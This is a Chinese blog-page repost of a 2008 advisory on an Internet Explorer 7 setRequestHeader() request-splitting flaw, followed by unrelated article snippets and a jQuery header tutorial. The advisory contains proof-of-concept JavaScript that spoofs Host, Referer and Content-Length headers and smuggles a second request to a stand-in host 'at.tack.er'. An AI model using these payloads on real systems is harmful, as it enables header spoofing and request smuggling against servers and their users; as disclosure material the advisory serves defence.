MS IE 7 setRequestHeader() 请求拆分和渗透漏洞

最新推荐文章于 2021-08-06 09:03:35 发布
最新推荐文章于 2021-08-06 09:03:35 发布 · 215 阅读 · 0
文章标签:

#IE #IT厂商 #Microsoft #XP #Windows

IE7存在HTTP请求拆分和渗透漏洞,允许通过恶意脚本覆盖Content-Length、Host和Referer等HTTP头部信息,可能导致HTTP头信息欺骗。此外,IE7允许设置TransferEncoding:chunked头,进一步引发请求拆分/渗透漏洞。

MS IE 7 setRequestHeader() 请求拆分和渗透漏洞 2008-03-28 16:25:22  www.hackbase.com  来源:互联网
受影响系统:Microsoft Internet Explorer 7.0.5730.11- Microsoft Windows XP SP2 描述:Internet Explorer是微软发布的非常流行的WEB浏览器。 IE 7允许通过HTTP请求拆分攻击覆盖Content-Length、Host和Refe ...
受影响系统:
Microsoft Internet Explorer 7.0.5730.11
- Microsoft Windows XP SP2

描述:
Internet Explorer是微软发布的非常流行的WEB浏览器。

IE 7允许通过HTTP请求拆分攻击覆盖Content-Length、Host和Referer等HTTP头,导致HTTP头信息欺骗。

类似于以下javascript:

var x=new XMLHttpRequest();

x.open("POST","/");
for(f=127;f<255;f++)
try{
x.setRequestHeader("Host"+String.fromCharCode(f),"Test");
}catch(dd){}
x.setRequestHeader("Connection","keep-alive");
x.onreadystatechange=function (){
    if (x.readyState == 4){
   }
}
x.send("blah");

会覆盖以下头:

- Content-Length
   x.setRequestHeader("Content-Length"+String.fromCharCode(201),"0");
   x.setRequestHeader("Content-Length"+String.fromCharCode(233),"0");
   x.setRequestHeader("Content-Length"+String.fromCharCode(240)+String.fromCharCode(213),"0");

- Host

   x.setRequestHeader("Host"+String.fromCharCode(223), "www.microsoft.com");

- Referer

   x.setRequestHeader("Referer"+String.fromCharCode(205)+String.fromCharCode(155),"http://www.referrer.tld");
   x.setRequestHeader("Referer"+String.fromCharCode(237)+String.fromCharCode(155),"http://www.referrer.tld");

Internet Explorer 7允许在setRequestHeader中设置Transfer Encoding: chunked头,导致Http请求拆分/渗透漏洞。

假设存在反射跨站脚本漏洞影响的站点与攻击者的站点托管在同一台主机上,且用户没有配置代理,由于IE7允许设置

setRequestHeader("Transfer-Encoding","chunked");

因此就允许将POST请求中的负载用作Web服务器的其他请求。例如:

var x=new XMLHttpRequest();

for(var i =0; i<1;i++){
x.open("POST","/");
x.setRequestHeader("Transfer-Encoding","chunked");

x.setRequestHeader("Proxy-Connection","keep-alive");
x.setRequestHeader("Connection","keep-alive");
x.onreadystatechange=function (){
    if (x.readyState == 4){
    }
}
try{
x.send("0/r/n/r/nPOST / HTTP/1.1/r/nHost:
at.tack.er/r/nContent-Length: SOMELENGTH/r/n/r/n")  }catch(r){} }

请求会变为:

POST / HTTP/1.1
Accept: */*
Accept-Language: it
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Referer: http://vi.ct.im/
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
.NET CLR 2.0.50727; .NET CLR 1.1.4322)
Host: at.tack.er
Content-Length: 67

0

POST /?Send1 HTTP/1.1
Host: at.tack.er
Content-Length: TheLenghtOfTheNextRequest

这样Web服务器就会打开套接字等待负载。

厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

 


关键字:IE7 漏洞

本篇文章来源于 黑客基地-全球最大的中文黑客站 原文链接:http://www.hackbase.com/tech/2008-03-28/40369.html

IE8IE9发送跨域请求
weixin_43938253的博客
07-24 1231
IE8IE9跨域请求“拒绝访问” 页面中偶尔会有跨域的需求,之前使用过jsonp格式的,但是这次后端提供了可以跨域访问的接口。 接口表现如下: 1、在谷歌浏览器火狐浏览器上正常 2、在IE10浏览器上正常 3、在IE9IE8浏览器上请求发送了,但是后端接口接收不到请求记录,在【网络】面板上也查询不到接口发送记录 在IE9IE8浏览器上经过打断点调试,发现是请求send()之后,立马被浏览器抛出异常“拒绝访问” function _http(_url, _method, _data, _async,
【CSRF-01】跨站请求伪造漏洞基础原理及攻防
m0_64378913的博客
07-01 1943
定义:CSRF(Cross-site request forgery,跨站请求伪造) 也被称为One Click Attack 或者 Session Riding ,通常缩写为 CSRF或者XSRF,是一种欺骗受害者提交恶意请求的攻击。它继承了受害者的身份特权,代表受害者执行非本意、恶意的操作。它强制终端用户在当前对其进行身份验证后的Web应用程序上执行非本意的操作。发生地点:Web应用程序上,不是系统也不是组件。 发生时间:在终端用户在当前对其进行身份验证后。 发生形式:“强制”执行用户非本意的操作,此
Microsoft IE 7 setRequestHeader()函数多个请求拆分/渗透漏洞
03-26 1051
受影响版本:Microsoft Internet Explorer 7.0.5730.11- Microsoft Windows XP SP2 描述:BUGTRAQ ID: 28379Internet Explorer是微软发布的非常流行的WEB浏览器。IE 7允许通过HTTP请求拆分攻击覆盖Content-Length、HostReferer等HTTP头,导致HTTP头信息欺骗。类
setRequestHeader("Connection","close")报错
Yana1225的博客
07-06 4208
问题产生: 今天在看前人留下的代码,走到ajax总是会报错:Refused to set unsafe header "Connection" 初步调研: 网上调查一番发现,chrome不支持一部分请求头setRequestHeader。 所以前人没关注这个错误,大概是因为系统主要是在 IE 里面运行的吧。 贴上代码: ...
关于HTTP keep-alive的实验
weixin_33845477的博客
09-24 208
2019独角兽企业重金招聘Python工程师标准>>> ...
ajax 关闭 keep alive,javascript - Ajax Request header keep alive - Stack Overflow
weixin_26749245的博客
08-06 422
I have Ajax request to update the client page if any new data is available to server.I have set the connection 'keep-Alive' So here I am not making new Ajax call every time to check the updated data. ...
如何使用HttpWebRequest POST数据时设置Connection="Keep-Alive"
rztyfx的专栏
12-17 8085
以下信息,来自:http://hi.baidu.com/iceser/blog/item/3006a559e02d3e272834f058.html 在使用HttpWebRequest来POST数据的时候,发现我们提交的请求里,并没有出现 Connection = "Keep-Alive" 的头 而由于某些原因,我们希望我们使用HttpWebRequest来提交的请求跟浏览器提交
深入理解Ajax的getpost请求
09-02
本文将深入探讨Ajax中的两种主要请求方式:GETPOST。 1. GET请求 GET请求是最常见的HTTP方法,通常用于从服务器获取资源。在Ajax中,GET请求的实现过程如下: - 首先,创建一个XMLHttpRequest对象,它是Ajax的...
java使用httpclient模拟post请求get请求示例
09-04
在这个示例中,我们将深入探讨如何使用HttpClient来模拟POSTGET请求。 首先,导入所需的库: ```java import org.apache.commons.httpclient.DefaultHttpMethodRetryHandler; import org.apache.commons....
js getpost请求实现代码解析
11-21
- **设置Content-Type**:虽然例子中没有提及,但实际的POST请求通常需要设置`Content-Type`头来指定数据格式,例如`xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded')`。 - **注意**:...
HttpClient中头部Header的使用
热门推荐
blue_jjw的专栏
04-07 12万+
今天看了几个使用HttpClient设置头部信息的帖子,发现使用的Header都是commons-httpclient包中的: import org.apache.commons.httpclient.Header; 但是commons-httpclient是一个遗留版本,官方已经不推荐使用,正确的方法是使用httpclient项目的httpcore-x.xxx.jar包中的H
Http长链接Connection:keep-alive的解答
kkgbn的博客
09-22 1万+
因为自己使用http请求都是,请求-应答这种方式,一直以为http是短链接的。每次通信后,其链接断开。 其实不然,http1.1开始。客户端的请求头带上 Connection: keep-alive 便是维持长链接。当然这个需要服务器的支持。 该方式可以使一次TCP连接为同意用户的多次请求服务,提高了响应速度。 因为http是无状态的,而且keep-live
HTTP响应头拆分/CRLF注入详解
许立峰的专栏
11-14 2万+
一:前言 “HTTP响应头拆分漏洞”是一种新型的web攻击方案,它重新产生了很多安全漏洞包括:web缓存感染、用户信息涂改、窃取敏感用户页面、跨站脚本漏洞。这项攻击方案,包括其衍生的一系列技术产生,是由于web应用程序没有对用户的提交进行严格过滤,导致非法用户可以提交一些恶意字符,更具体来说,是对用户输入的CR LF字符没有进行严格的过滤。 “HTTP响应头拆分漏洞”及其相关的攻击手段可以在
HTTP请求Header分析
coach
01-27 3282
客户端HTTP请求的Header信息 1、HTTP请求方式 GET 向Web服务器请求一个文件 POST 向Web服务器发送数据让Web服务器进行处理 PUT 向Web服务器发送数据并存储在Web服务器内部 HEAD 检查一个对象是否存在 DELETE 从Web服务器上删除一个文件 CONNECT 对通道提供支持 TRACE 跟踪到服务器的路径 O...
IE7+浏览器下XMLHttpRequest跨域请求安全配置
bytxl的专栏
03-10 2386
IE7+浏览器已经开始支持XMLHttpRequest对象,当使用XMLHttpRequest请求不同源的文件(不同域名的页面),浏览器是否启用安全-》internet区域的“通过域访问数据源”有关系。 如果启用了此选项,那么所有跨域的页面都可以访问,即使跨域的页面没有设置过Access-Control-Allow-Origin响应头。如果禁用了“通过域访问数据源”,跨域页面设置过Acce
如何解决响应头缺失漏洞解决
zz_1231的博客
10-15 6926
测试抓包扫出有响应头缺失的漏洞,先给出解决方案,下面再详细解释每个漏洞。 public class ResponseHeadFilter implements Filter { @Override public void init(FilterConfig filterConfig) throws ServletException { } public void doFilter(ServletRequest request, ServletResponse response...
ajax设置请求头setRequestHeader方法,如请求数据类型等
All things will be fine__
02-20 4万+
因为平时常用的设置,所以突然被问起来会忘,一般我们ajax是直接利用jQuery的ajax方法,里面的接口直接调用,常用的主要有: url 类型:String 默认值: 当前页地址。发送请求的地址。 type 类型:String 默认值: "GET"。请求方式"POST"或"GET", 默认为"GET"。注意:其它HTTP请求方法,如PUTDELETE也可以使用,但仅部分浏览器支持。 ...
ajax请求中设置特殊的RequestHeader
diehe5608的博客
10-12 199
现在ajax应用已经相当广泛了,有很多不错的ajax框架可供使用。ajax是一个异步请求,也主要是一种客户端的脚本行为。那么,如何在请求之前为请求添加特殊的一些头部信息呢? 下面是一个简单的例子,我用jquery编写,它的ajax函数中,有一个beforeSend方法,这个方法接受一个参数,就代表了发起异步请求的XMLHttpRequest对象,我们可以用该对象的setReques...
jquery post请求,如何修改setRequestHeader
最新发布
08-22
<think>我们正在讨论的是在jQuery的POST请求中如何设置或修改请求头(HTTP headers)。根据引用[2]引用[4],我们可以使用`$.ajax`方法,并在其中通过`headers`选项或`beforeSend`回调函数来设置自定义请求头。 ### 方法一:使用`headers`选项(推荐) 在`$.ajax`配置中直接设置`headers`对象,每个属性代表一个请求头字段。 示例代码: ```javascript $.ajax({ url: 'your-endpoint-url', // 请求的URL type: 'POST', // 请求方法,这里为POST headers: { // 设置请求头 'Custom-Header1': 'value1', 'Custom-Header2': 'value2' }, data: { // 发送的数据 key1: 'value1', key2: 'value2' }, success: function(response) { // 请求成功处理 console.log(response); }, error: function(xhr, status, error) { // 请求失败处理 console.error(error); } }); ``` ### 方法二:使用`beforeSend`回调函数 在发送请求之前,通过`beforeSend`回调函数修改XMLHttpRequest对象的请求头。这个回调函数接收XMLHttpRequest对象作为参数。 示例代码: ```javascript $.ajax({ url: 'your-endpoint-url', type: 'POST', beforeSend: function(xhr) { // 设置自定义请求头 xhr.setRequestHeader('Custom-Header1', 'value1'); xhr.setRequestHeader('Custom-Header2', 'value2'); }, data: { key1: 'value1', key2: 'value2' }, success: function(response) { console.log(response); }, error: function(xhr, status, error) { console.error(error); } }); ``` ### 注意事项: 1. **跨域请求**:如果请求是跨域的,浏览器会先发送一个OPTIONS预检请求(preflight)来检查服务器是否允许这些自定义请求头。如果服务器没有在预检响应的`Access-Control-Allow-Headers`中包含你的自定义请求头请求会被拒绝(如引用[5]所提到的错误)[^5]。因此,确保服务器端配置了允许这些自定义请求头。 2. **保留请求头**:避免覆盖一些重要的请求头(如`Content-Type`)。如果设置`Content-Type`,通常应该设置为`application/x-www-form-urlencoded`(如引用[3]所述)[^3]或`application/json`等,具体取决于你发送的数据格式。 3. **安全性**:设置请求头时,特别是涉及身份验证的(如`Authorization`),确保通过HTTPS传输,避免敏感信息泄露。 ### 完整示例(设置Content-Type为application/json): ```javascript $.ajax({ url: 'https://api.example.com/data', type: 'POST', headers: { 'Content-Type': 'application/json', // 设置请求体为JSON格式 'Authorization': 'Bearer your_token_here' }, data: JSON.stringify({ // 将数据转换为JSON字符串 name: 'John', age: 30 }), success: function(response) { console.log('Success:', response); }, error: function(xhr, status, error) { console.error('Error:', error); } }); ``` ### 总结: - 使用`headers`选项是设置请求头最直接的方式。 - 使用`beforeSend`可以在发送前动态设置请求头(例如,根据条件添加)。 - 注意跨域问题服务器端配置。 通过以上方法,你可以在jQuery的POST请求中自定义请求头。 §§相关问题§§ 1. 在跨域请求中,如何配置服务器以允许自定义请求头? 2. jQuery中除了`$.ajax`,还有哪些方法可以发送POST请求并设置请求头? 3. 如何避免在设置自定义请求头时触发OPTIONS预检请求?</think>### 在jQuery POST请求中设置或修改请求头的方法 在jQuery中设置HTTP请求头有两种主要方法,根据引用[2][3][4]的信息,以下是详细解决方案: #### 方法1:使用`headers`参数(推荐) 直接在`$.ajax`配置中使用`headers`对象设置请求头: ```javascript $.ajax({ url: 'your-api-endpoint', type: 'POST', headers: { // 设置自定义请求头 'Authorization': 'Bearer your_token', 'X-Custom-Header': 'custom_value', 'Content-Type': 'application/json' // 设置内容类型 }, data: JSON.stringify({ // POST数据 key1: 'value1', key2: 'value2' }), success: function(response) { console.log('成功:', response); }, error: function(xhr) { console.error('错误:', xhr.statusText); } }); ``` **特点**: - 最简洁直接的方式 - 适合设置固定请求头值 - 支持同时设置多个请求头[^2] #### 方法2:使用`beforeSend`回调 通过回调函数动态设置请求头: ```javascript $.ajax({ url: 'your-api-endpoint', type: 'POST', data: { key: 'value' }, beforeSend: function(xhr) { // 动态设置请求头 xhr.setRequestHeader('X-Request-ID', generateUUID()); xhr.setRequestHeader('Authorization', 'Bearer ' + getToken()); // 显示加载状态(如引用[4]) $('#loading').show(); }, complete: function() { $('#loading').hide(); // 隐藏加载状态 } }); ``` **适用场景**: - 需要动态生成请求头值(如时间戳、动态token) - 需要在发送前执行额外操作(如禁用提交按钮)[^4] - 需要更精细的控制 #### 关键注意事项: 1. **跨域问题**: - 自定义请求头会触发CORS预检请求(OPTIONS) - 确保服务器响应包含:`Access-Control-Allow-Headers: your-custom-header`[^5] ```http Access-Control-Allow-Headers: Authorization, X-Custom-Header ``` 2. **内容类型设置**: - 对于JSON数据必须设置(如引用[3]): ```javascript headers: { 'Content-Type': 'application/json' } ``` - 对于表单数据使用: ```javascript headers: { 'Content-Type': 'application/x-www-form-urlencoded' } ``` 3. **保留请求头**: - 避免覆盖浏览器自动设置的请求头(如`Host`, `Connection`) - 不要修改`Content-Length`等系统级请求头 #### 完整示例(带安全令牌): ```javascript // 获取CSRF令牌(假设存储在meta标签) const csrfToken = $('meta[name="csrf-token"]').attr('content'); $.ajax({ url: '/api/save-data', type: 'POST', headers: { 'X-CSRF-Token': csrfToken, // CSRF保护 'X-Requested-With': 'XMLHttpRequest' }, data: { user: { name: '张三', email: 'test@example.com' } }, beforeSend: function(xhr) { xhr.setRequestHeader('X-Request-ID', Date.now()); // 添加请求ID }, success(response) { alert(`保存成功: ${response.message}`); } }); ``` ### 常见问题解决 **问题:请求被CORS阻止** > `Request header field X-Token is not allowed` **解决方案**: 1. 服务器添加响应头: ```http Access-Control-Allow-Headers: X-Token, Content-Type ``` 2. 简单请求避免使用自定义头(改用URL参数) **问题:服务器未收到请求头** - 检查浏览器开发者工具 > Network > 请求头 - 确保没有拼写错误(HTTP头名称大小写不敏感但需一致) 通过正确设置请求头,您可以实现身份验证、CSRF保护、跟踪请求等高级功能[^2][^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值